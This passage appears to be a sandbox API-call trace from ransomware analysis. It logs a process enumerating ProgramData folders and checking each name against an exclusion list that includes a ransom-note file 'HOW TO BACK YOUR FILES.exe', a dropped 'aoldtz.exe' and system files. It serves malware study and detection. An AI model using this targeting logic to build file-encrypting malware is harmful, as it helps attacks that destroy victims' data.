nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eHome", cAlternateFileName="")) returned 1 [0083.638] lstrcmpiW (lpString1="eHome", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.638] lstrcmpiW (lpString1="eHome", lpString2="aoldtz.exe") returned 1 [0083.639] lstrcmpiW (lpString1="eHome", lpString2=".") returned 1 [0083.639] lstrcmpiW (lpString1="eHome", lpString2="..") returned 1 [0083.639] lstrcmpiW (lpString1="eHome", lpString2="windows") returned -1 [0083.639] lstrcmpiW (lpString1="eHome", lpString2="bootmgr") returned 1 [0083.639] lstrcmpiW (lpString1="eHome", lpString2="temp") returned -1 [0083.639] lstrcmpiW (lpString1="eHome", lpString2="pagefile.sys") returned -1 [0083.639] lstrcmpiW (lpString1="eHome", lpString2="boot") returned 1 [0083.639] lstrcmpiW (lpString1="eHome", lpString2="ids.txt") returned -1 [0083.639] lstrcmpiW (lpString1="eHome", lpString2="ntuser.dat") returned -1 [0083.639] lstrcmpiW (lpString1="eHome", lpString2="perflogs") returned -1 [0083.639] lstrcmpiW (lpString1="eHome", lpString2="MSBuild") returned -1 [0083.639] lstrlenW (lpString="eHome") returned 5 [0083.639] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\DRM") returned 32 [0083.639] lstrcpyW (in: lpString1=0x2cce43a, lpString2="eHome" | out: lpString1="eHome") returned="eHome" [0083.639] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7bc8 [0083.639] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x46) returned 0x2ee7e0 [0083.639] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bd0 | out: ListHead=0x2e7710, ListEntry=0x2e7bd0) returned 0x2e7b70 [0083.639] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x4c6cdfe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c6cdfe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Event Viewer", cAlternateFileName="EVENTV~1")) returned 1 [0083.639] lstrcmpiW (lpString1="Event Viewer", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.639] lstrcmpiW (lpString1="Event Viewer", lpString2="aoldtz.exe") returned 1 [0083.639] lstrcmpiW (lpString1="Event Viewer", lpString2=".") returned 1 [0083.639] lstrcmpiW (lpString1="Event Viewer", lpString2="..") returned 1 [0083.639] lstrcmpiW (lpString1="Event Viewer", lpString2="windows") returned -1 [0083.639] lstrcmpiW (lpString1="Event Viewer", lpString2="bootmgr") returned 1 [0083.639] lstrcmpiW (lpString1="Event Viewer", lpString2="temp") returned -1 [0083.639] lstrcmpiW (lpString1="Event Viewer", lpString2="pagefile.sys") returned -1 [0083.639] lstrcmpiW (lpString1="Event Viewer", lpString2="boot") returned 1 [0083.639] lstrcmpiW (lpString1="Event Viewer", lpString2="ids.txt") returned -1 [0083.639] lstrcmpiW (lpString1="Event Viewer", lpString2="ntuser.dat") returned -1 [0083.639] lstrcmpiW (lpString1="Event Viewer", lpString2="perflogs") returned -1 [0083.639] lstrcmpiW (lpString1="Event Viewer", lpString2="MSBuild") returned -1 [0083.639] lstrlenW (lpString="Event Viewer") returned 12 [0083.639] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\eHome") returned 34 [0083.639] lstrcpyW (in: lpString1=0x2cce43a, lpString2="Event Viewer" | out: lpString1="Event Viewer") returned="Event Viewer" [0083.639] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ca8 [0083.639] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x54) returned 0x2df770 [0083.639] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7cb0 | out: ListHead=0x2e7710, ListEntry=0x2e7cb0) returned 0x2e7bd0 [0083.640] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c315d80, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c315d80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0083.640] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0083.640] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c6a7e80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c6a7e80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IdentityCRL", cAlternateFileName="IDENTI~1")) returned 1 [0083.640] lstrcmpiW (lpString1="IdentityCRL", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.640] lstrcmpiW (lpString1="IdentityCRL", lpString2="aoldtz.exe") returned 1 [0083.640] lstrcmpiW (lpString1="IdentityCRL", lpString2=".") returned 1 [0083.640] lstrcmpiW (lpString1="IdentityCRL", lpString2="..") returned 1 [0083.640] lstrcmpiW (lpString1="IdentityCRL", lpString2="windows") returned -1 [0083.640] lstrcmpiW (lpString1="IdentityCRL", lpString2="bootmgr") returned 1 [0083.640] lstrcmpiW (lpString1="IdentityCRL", lpString2="temp") returned -1 [0083.640] lstrcmpiW (lpString1="IdentityCRL", lpString2="pagefile.sys") returned -1 [0083.640] lstrcmpiW (lpString1="IdentityCRL", lpString2="boot") returned 1 [0083.640] lstrcmpiW (lpString1="IdentityCRL", lpString2="ids.txt") returned -1 [0083.640] lstrcmpiW (lpString1="IdentityCRL", lpString2="ntuser.dat") returned -1 [0083.640] lstrcmpiW (lpString1="IdentityCRL", lpString2="perflogs") returned -1 [0083.640] lstrcmpiW (lpString1="IdentityCRL", lpString2="MSBuild") returned -1 [0083.640] lstrlenW (lpString="IdentityCRL") returned 11 [0083.640] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Event Viewer") returned 41 [0083.640] lstrcpyW (in: lpString1=0x2cce43a, lpString2="IdentityCRL" | out: lpString1="IdentityCRL") returned="IdentityCRL" [0083.640] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b88 [0083.640] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x52) returned 0x2df7d0 [0083.640] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b90 | out: ListHead=0x2e7710, ListEntry=0x2e7b90) returned 0x2e7cb0 [0083.640] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3ee349fc, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x4c65bbc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c65bbc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Media Player", cAlternateFileName="MEDIAP~1")) returned 1 [0083.640] lstrcmpiW (lpString1="Media Player", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.640] lstrcmpiW (lpString1="Media Player", lpString2="aoldtz.exe") returned 1 [0083.640] lstrcmpiW (lpString1="Media Player", lpString2=".") returned 1 [0083.640] lstrcmpiW (lpString1="Media Player", lpString2="..") returned 1 [0083.640] lstrcmpiW (lpString1="Media Player", lpString2="windows") returned -1 [0083.640] lstrcmpiW (lpString1="Media Player", lpString2="bootmgr") returned 1 [0083.640] lstrcmpiW (lpString1="Media Player", lpString2="temp") returned -1 [0083.640] lstrcmpiW (lpString1="Media Player", lpString2="pagefile.sys") returned -1 [0083.640] lstrcmpiW (lpString1="Media Player", lpString2="boot") returned 1 [0083.640] lstrcmpiW (lpString1="Media Player", lpString2="ids.txt") returned 1 [0083.640] lstrcmpiW (lpString1="Media Player", lpString2="ntuser.dat") returned -1 [0083.640] lstrcmpiW (lpString1="Media Player", lpString2="perflogs") returned -1 [0083.640] lstrcmpiW (lpString1="Media Player", lpString2="MSBuild") returned -1 [0083.641] lstrlenW (lpString="Media Player") returned 12 [0083.641] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\IdentityCRL") returned 40 [0083.641] lstrcpyW (in: lpString1=0x2cce43a, lpString2="Media Player" | out: lpString1="Media Player") returned="Media Player" [0083.641] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c28 [0083.641] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x54) returned 0x2df830 [0083.641] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c30 | out: ListHead=0x2e7710, ListEntry=0x2e7c30) returned 0x2e7b90 [0083.641] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c65bbc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c65bbc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MF", cAlternateFileName="")) returned 1 [0083.641] lstrcmpiW (lpString1="MF", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.641] lstrcmpiW (lpString1="MF", lpString2="aoldtz.exe") returned 1 [0083.641] lstrcmpiW (lpString1="MF", lpString2=".") returned 1 [0083.641] lstrcmpiW (lpString1="MF", lpString2="..") returned 1 [0083.641] lstrcmpiW (lpString1="MF", lpString2="windows") returned -1 [0083.641] lstrcmpiW (lpString1="MF", lpString2="bootmgr") returned 1 [0083.641] lstrcmpiW (lpString1="MF", lpString2="temp") returned -1 [0083.641] lstrcmpiW (lpString1="MF", lpString2="pagefile.sys") returned -1 [0083.641] lstrcmpiW (lpString1="MF", lpString2="boot") returned 1 [0083.641] lstrcmpiW (lpString1="MF", lpString2="ids.txt") returned 1 [0083.641] lstrcmpiW (lpString1="MF", lpString2="ntuser.dat") returned -1 [0083.641] lstrcmpiW (lpString1="MF", lpString2="perflogs") returned -1 [0083.641] lstrcmpiW (lpString1="MF", lpString2="MSBuild") returned -1 [0083.641] lstrlenW (lpString="MF") returned 2 [0083.641] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Media Player") returned 41 [0083.641] lstrcpyW (in: lpString1=0x2cce43a, lpString2="MF" | out: lpString1="MF") returned="MF" [0083.641] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7808 [0083.641] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x40) returned 0x2e6288 [0083.641] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7810 | out: ListHead=0x2e7710, ListEntry=0x2e7810) returned 0x2e7c30 [0083.641] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x4c635a60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c635a60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSDN", cAlternateFileName="")) returned 1 [0083.641] lstrcmpiW (lpString1="MSDN", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.641] lstrcmpiW (lpString1="MSDN", lpString2="aoldtz.exe") returned 1 [0083.641] lstrcmpiW (lpString1="MSDN", lpString2=".") returned 1 [0083.641] lstrcmpiW (lpString1="MSDN", lpString2="..") returned 1 [0083.641] lstrcmpiW (lpString1="MSDN", lpString2="windows") returned -1 [0083.641] lstrcmpiW (lpString1="MSDN", lpString2="bootmgr") returned 1 [0083.641] lstrcmpiW (lpString1="MSDN", lpString2="temp") returned -1 [0083.642] lstrcmpiW (lpString1="MSDN", lpString2="pagefile.sys") returned -1 [0083.642] lstrcmpiW (lpString1="MSDN", lpString2="boot") returned 1 [0083.642] lstrcmpiW (lpString1="MSDN", lpString2="ids.txt") returned 1 [0083.642] lstrcmpiW (lpString1="MSDN", lpString2="ntuser.dat") returned -1 [0083.642] lstrcmpiW (lpString1="MSDN", lpString2="perflogs") returned -1 [0083.642] lstrcmpiW (lpString1="MSDN", lpString2="MSBuild") returned 1 [0083.642] lstrlenW (lpString="MSDN") returned 4 [0083.642] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\MF") returned 31 [0083.642] lstrcpyW (in: lpString1=0x2cce43a, lpString2="MSDN" | out: lpString1="MSDN") returned="MSDN" [0083.642] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e77c8 [0083.642] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x44) returned 0x2eea10 [0083.642] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e77d0 | out: ListHead=0x2e7710, ListEntry=0x2e77d0) returned 0x2e7810 [0083.642] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x56ac2f60, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x4c635a60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c635a60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetFramework", cAlternateFileName="NETFRA~1")) returned 1 [0083.642] lstrcmpiW (lpString1="NetFramework", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.642] lstrcmpiW (lpString1="NetFramework", lpString2="aoldtz.exe") returned 1 [0083.642] lstrcmpiW (lpString1="NetFramework", lpString2=".") returned 1 [0083.642] lstrcmpiW (lpString1="NetFramework", lpString2="..") returned 1 [0083.642] lstrcmpiW (lpString1="NetFramework", lpString2="windows") returned -1 [0083.642] lstrcmpiW (lpString1="NetFramework", lpString2="bootmgr") returned 1 [0083.642] lstrcmpiW (lpString1="NetFramework", lpString2="temp") returned -1 [0083.642] lstrcmpiW (lpString1="NetFramework", lpString2="pagefile.sys") returned -1 [0083.642] lstrcmpiW (lpString1="NetFramework", lpString2="boot") returned 1 [0083.642] lstrcmpiW (lpString1="NetFramework", lpString2="ids.txt") returned 1 [0083.642] lstrcmpiW (lpString1="NetFramework", lpString2="ntuser.dat") returned -1 [0083.642] lstrcmpiW (lpString1="NetFramework", lpString2="perflogs") returned -1 [0083.642] lstrcmpiW (lpString1="NetFramework", lpString2="MSBuild") returned 1 [0083.642] lstrlenW (lpString="NetFramework") returned 12 [0083.642] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\MSDN") returned 33 [0083.642] lstrcpyW (in: lpString1=0x2cce43a, lpString2="NetFramework" | out: lpString1="NetFramework") returned="NetFramework" [0083.642] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7788 [0083.642] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x54) returned 0x2df890 [0083.642] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7790 | out: ListHead=0x2e7710, ListEntry=0x2e7790) returned 0x2e77d0 [0083.642] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c60f900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c60f900, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Network", cAlternateFileName="")) returned 1 [0083.642] lstrcmpiW (lpString1="Network", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.642] lstrcmpiW (lpString1="Network", lpString2="aoldtz.exe") returned 1 [0083.643] lstrcmpiW (lpString1="Network", lpString2=".") returned 1 [0083.643] lstrcmpiW (lpString1="Network", lpString2="..") returned 1 [0083.643] lstrcmpiW (lpString1="Network", lpString2="windows") returned -1 [0083.643] lstrcmpiW (lpString1="Network", lpString2="bootmgr") returned 1 [0083.643] lstrcmpiW (lpString1="Network", lpString2="temp") returned -1 [0083.643] lstrcmpiW (lpString1="Network", lpString2="pagefile.sys") returned -1 [0083.643] lstrcmpiW (lpString1="Network", lpString2="boot") returned 1 [0083.643] lstrcmpiW (lpString1="Network", lpString2="ids.txt") returned 1 [0083.643] lstrcmpiW (lpString1="Network", lpString2="ntuser.dat") returned -1 [0083.643] lstrcmpiW (lpString1="Network", lpString2="perflogs") returned -1 [0083.643] lstrcmpiW (lpString1="Network", lpString2="MSBuild") returned 1 [0083.643] lstrlenW (lpString="Network") returned 7 [0083.643] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\NetFramework") returned 41 [0083.643] lstrcpyW (in: lpString1=0x2cce43a, lpString2="Network" | out: lpString1="Network") returned="Network" [0083.643] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79e8 [0083.643] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x4a) returned 0x2ed8a0 [0083.643] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79f0 | out: ListHead=0x2e7710, ListEntry=0x2e79f0) returned 0x2e7790 [0083.643] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x4c5e97a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c5e97a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OFFICE", cAlternateFileName="")) returned 1 [0083.643] lstrcmpiW (lpString1="OFFICE", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.643] lstrcmpiW (lpString1="OFFICE", lpString2="aoldtz.exe") returned 1 [0083.643] lstrcmpiW (lpString1="OFFICE", lpString2=".") returned 1 [0083.643] lstrcmpiW (lpString1="OFFICE", lpString2="..") returned 1 [0083.643] lstrcmpiW (lpString1="OFFICE", lpString2="windows") returned -1 [0083.643] lstrcmpiW (lpString1="OFFICE", lpString2="bootmgr") returned 1 [0083.643] lstrcmpiW (lpString1="OFFICE", lpString2="temp") returned -1 [0083.643] lstrcmpiW (lpString1="OFFICE", lpString2="pagefile.sys") returned -1 [0083.643] lstrcmpiW (lpString1="OFFICE", lpString2="boot") returned 1 [0083.643] lstrcmpiW (lpString1="OFFICE", lpString2="ids.txt") returned 1 [0083.643] lstrcmpiW (lpString1="OFFICE", lpString2="ntuser.dat") returned 1 [0083.643] lstrcmpiW (lpString1="OFFICE", lpString2="perflogs") returned -1 [0083.643] lstrcmpiW (lpString1="OFFICE", lpString2="MSBuild") returned 1 [0083.643] lstrlenW (lpString="OFFICE") returned 6 [0083.643] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Network") returned 36 [0083.643] lstrcpyW (in: lpString1=0x2cce43a, lpString2="OFFICE" | out: lpString1="OFFICE") returned="OFFICE" [0083.643] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a08 [0083.643] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x48) returned 0x2eea60 [0083.644] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a10 | out: ListHead=0x2e7710, ListEntry=0x2e7a10) returned 0x2e79f0 [0083.644] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x4c59d4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c59d4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OfficeSoftwareProtectionPlatform", cAlternateFileName="OFFICE~1")) returned 1 [0083.644] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.644] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="aoldtz.exe") returned 1 [0083.644] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2=".") returned 1 [0083.644] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="..") returned 1 [0083.644] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="windows") returned -1 [0083.644] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="bootmgr") returned 1 [0083.644] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="temp") returned -1 [0083.644] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="pagefile.sys") returned -1 [0083.644] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="boot") returned 1 [0083.644] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="ids.txt") returned 1 [0083.644] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="ntuser.dat") returned 1 [0083.644] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="perflogs") returned -1 [0083.644] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="MSBuild") returned 1 [0083.644] lstrlenW (lpString="OfficeSoftwareProtectionPlatform") returned 32 [0083.644] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE") returned 35 [0083.644] lstrcpyW (in: lpString1=0x2cce43a, lpString2="OfficeSoftwareProtectionPlatform" | out: lpString1="OfficeSoftwareProtectionPlatform") returned="OfficeSoftwareProtectionPlatform" [0083.644] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a28 [0083.644] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7c) returned 0x2f00d8 [0083.644] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a30 | out: ListHead=0x2e7710, ListEntry=0x2e7a30) returned 0x2e7a10 [0083.644] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c577380, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c577380, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RAC", cAlternateFileName="")) returned 1 [0083.644] lstrcmpiW (lpString1="RAC", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.644] lstrcmpiW (lpString1="RAC", lpString2="aoldtz.exe") returned 1 [0083.644] lstrcmpiW (lpString1="RAC", lpString2=".") returned 1 [0083.644] lstrcmpiW (lpString1="RAC", lpString2="..") returned 1 [0083.644] lstrcmpiW (lpString1="RAC", lpString2="windows") returned -1 [0083.644] lstrcmpiW (lpString1="RAC", lpString2="bootmgr") returned 1 [0083.644] lstrcmpiW (lpString1="RAC", lpString2="temp") returned -1 [0083.644] lstrcmpiW (lpString1="RAC", lpString2="pagefile.sys") returned 1 [0083.644] lstrcmpiW (lpString1="RAC", lpString2="boot") returned 1 [0083.644] lstrcmpiW (lpString1="RAC", lpString2="ids.txt") returned 1 [0083.644] lstrcmpiW (lpString1="RAC", lpString2="ntuser.dat") returned 1 [0083.644] lstrcmpiW (lpString1="RAC", lpString2="perflogs") returned 1 [0083.644] lstrcmpiW (lpString1="RAC", lpString2="MSBuild") returned 1 [0083.644] lstrlenW (lpString="RAC") returned 3 [0083.645] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform") returned 61 [0083.645] lstrcpyW (in: lpString1=0x2cce43a, lpString2="RAC" | out: lpString1="RAC") returned="RAC" [0083.645] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a48 [0083.645] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x42) returned 0x2eeab0 [0083.645] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a50 | out: ListHead=0x2e7710, ListEntry=0x2e7a50) returned 0x2e7a30 [0083.645] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27df8b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4c551220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c551220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Search", cAlternateFileName="")) returned 1 [0083.645] lstrcmpiW (lpString1="Search", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.645] lstrcmpiW (lpString1="Search", lpString2="aoldtz.exe") returned 1 [0083.645] lstrcmpiW (lpString1="Search", lpString2=".") returned 1 [0083.645] lstrcmpiW (lpString1="Search", lpString2="..") returned 1 [0083.645] lstrcmpiW (lpString1="Search", lpString2="windows") returned -1 [0083.645] lstrcmpiW (lpString1="Search", lpString2="bootmgr") returned 1 [0083.645] lstrcmpiW (lpString1="Search", lpString2="temp") returned -1 [0083.645] lstrcmpiW (lpString1="Search", lpString2="pagefile.sys") returned 1 [0083.645] lstrcmpiW (lpString1="Search", lpString2="boot") returned 1 [0083.645] lstrcmpiW (lpString1="Search", lpString2="ids.txt") returned 1 [0083.645] lstrcmpiW (lpString1="Search", lpString2="ntuser.dat") returned 1 [0083.645] lstrcmpiW (lpString1="Search", lpString2="perflogs") returned 1 [0083.645] lstrcmpiW (lpString1="Search", lpString2="MSBuild") returned 1 [0083.645] lstrlenW (lpString="Search") returned 6 [0083.645] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\RAC") returned 32 [0083.645] lstrcpyW (in: lpString1=0x2cce43a, lpString2="Search" | out: lpString1="Search") returned="Search" [0083.645] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a68 [0083.645] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x48) returned 0x2eeb00 [0083.645] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a70 | out: ListHead=0x2e7710, ListEntry=0x2e7a70) returned 0x2e7a50 [0083.645] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c52b0c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c52b0c0, 